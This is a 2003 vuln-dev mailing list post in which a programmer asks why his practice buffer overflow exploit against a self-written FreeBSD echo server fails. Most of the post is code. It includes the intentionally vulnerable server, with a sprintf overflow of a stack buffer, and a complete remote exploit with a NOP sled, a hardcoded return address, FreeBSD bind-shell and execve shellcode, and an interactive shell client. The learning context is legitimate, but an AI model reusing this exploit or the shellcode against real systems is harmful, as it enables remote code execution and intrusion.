Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Sun, 28 Sep 2003 15:14:14 +0900
Hi, When I run exploit in daemon host I see following message: ./vulnerable 30460 client from xxx.xxx.xxx.xxx Exploit binds shell in port 12345. However when I try to connect to 12345 port, I see following ./vulnerable 30460 client from xxx.xxx.xxx.xxxSegmentation fault (core dumped)Could you tell me what is wrong here? I suspect port bind shellcode is still connected to main daemon and when it receives connection
daemon crashes and it crashes port binding shellcode. Am I right? Ganbold At 11:37 PM 9/27/2003 -0300, you wrote:
You say that you can connect after the exploit, but then the connection gets dropped immediately afterwards... is there a firewall in place?From: Ganbold <ganbold () micom mng net> To: vuln-dev () securityfocus com Subject: sample buffer overflow exploit problem Date: Sat, 27 Sep 2003 16:54:59 +0900 Hi,I'm very new to buffer overflow exploit technics and my boss wants me to thoroughly understand how it works. I'm trying to exploit sample network server in FreeBSD 5.1 for this purpose. When I try to exploit using execve /bin/sh (shellcode1), it works and launches the shell in the remote machine. However when I try to use port binding shell code, it binds shell to the port, but when I try to connect to it, it just closes the connection. Also I can't connect to bind port after sending buffer using following code snippets:.............. printf("[-] Connecting to bindshell...\n"); remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(12345); if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr, "Error: connect\n"); return -1; } exec_sh(s); ............... I appreciate if somebody give me some help to solve this test problem.Is there anywhere I can find detailed explanation about buffer overflows and working sample network exploits?Is there anyway I can generate shellcodes in FreeBSD? I attached my sample server code and exploit code. thanks in advance, Ganbold Ts, senior programmer, Micom Co., Ltd Ulaanbaatar, Mongolia Following is network server code: -------------------------------------------------------------------------------------------------------------------------------- #include <stdio.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <errno.h> #define BUFFER_SIZE 1024 #define NAME_SIZE 2048 int handle(int c) { char buffer[BUFFER_SIZE], name[NAME_SIZE]; int bytes; strcpy(buffer, "Your name?: "); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; bytes = recv(c, name, sizeof(name), 0); if (bytes == -1) return -1; name[bytes - 1] = '\0'; sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; return 0; } int main(int argc, char *argv[]) { int s, c, cli_size; struct sockaddr_in srv, cli; if (argc != 2) { fprintf(stderr, "usage: %s port\n", argv[0]); return 1; } s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return 2; } srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons( (unsigned short int) atol(argv[1])); srv.sin_family = AF_INET; if (bind(s, &srv, sizeof(srv)) == -1) { perror("bind() failed"); return 3; } if (listen(s, 3) == -1) { perror("listen() failed"); return 4; } for(;;) { c = accept(s, &cli, &cli_size); if (c == -1) { perror("accept() failed"); return 5; } fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr)); if (handle(c) == -1) fprintf(stderr, "%s: handle() failed", argv[0]); close(c); } return 0; } -------------------------------------------------------------------------------------------------------------------------------- Following is the sample exploit code: -------------------------------------------------------------------------------------------------------------------------------- #include <stdio.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <errno.h> #include <unistd.h> /* * FreeBSD shellcode - binds /bin/sh to a port 12345 * * Claes M. Nyberg 20020619 * * <cmn () darklab org>, <md0claes () mdstud chalmers se> */ char shellcode[] = /* port _______*/ "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39" "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd" "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83" "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53" "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50" "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0" "\x40\x50\x50\xcd\x80"; /* * FreeBSD shellcode - execve /bin/sh * * Claes M. Nyberg 20020120 * * <cmn () darklab org>, <md0claes () mdstud chalmers se> */ char shellcode1[] = "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp, %ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe2" /* movl %esp, %edx */ "\x50" /* pushl %eax */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax, %eax */ "\x40" /* inc %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xcd\x80"; /* int $0x80 */ #define RET 0xbfbffa48 int exec_sh(int sockfd) { char snd[4096],rcv[4096]; fd_set rset; while(1) { FD_ZERO(&rset); FD_SET(fileno(stdin),&rset); FD_SET(sockfd,&rset); select(255,&rset,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&rset)) { memset(snd,0,sizeof(snd)); fgets(snd,sizeof(snd),stdin); write(sockfd,snd,strlen(snd)); } if(FD_ISSET(sockfd,&rset)) { memset(rcv,0,sizeof(rcv)); if(read(sockfd,rcv,sizeof(rcv))<=0) exit(0); fputs(rcv,stdout); } } } int main(int argc, char *argv[]) { char buffer[1064]; int s,t, i, size; struct sockaddr_in remote; struct hostent *host; if(argc != 3) { printf("Usage: %s target-ip port\n", argv[0]); return -1; } // filling buffer with NOPs memset(buffer, 0x90, 1064); //copying shellcode into buffermemcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));// the previous statement causes a unintential Nullbyte at buffer[1000]buffer[1000] = 0x90;// Copying the return address multiple times at the end of the buffer...for(i=1022; i < 1059; i+=4) { * ((int *) &buffer[i]) = RET; } buffer[1063] = 0x0; //getting hostname host=gethostbyname(argv[1]); if (host==NULL) { fprintf(stderr, "Unknown Host %s\n",argv[1]); return -1; } // creating socket... s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) { fprintf(stderr, "Error: Socket\n"); return -1; } remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(atoi(argv[2])); // connecting with destination host if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr, "Error: connect\n"); return -1; } //sending exploit string size = send(s, buffer, sizeof(buffer), 0); if (size==-1) { close(s); fprintf(stderr, "sending data failed\n"); return -1; } /* printf("[-] Connecting to bindshell...\n"); remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(12345); if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr, "Error: connect\n"); return -1; } exec_sh(s); */ // closing socket close(s); } --------------------------------------------------------------------------------------------------------------------------------_________________________________________________________________ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail
Current thread:
- sample buffer overflow exploit problem Ganbold (Sep 27)
- Message not available
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Message not available
- Re: sample buffer overflow exploit problem upb (Sep 29)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem deepcode . (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem sohlow (Sep 29)
- Re: sample buffer overflow exploit problem Vade 79 (Sep 30)
- RE: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Gerardo Richarte (Sep 30)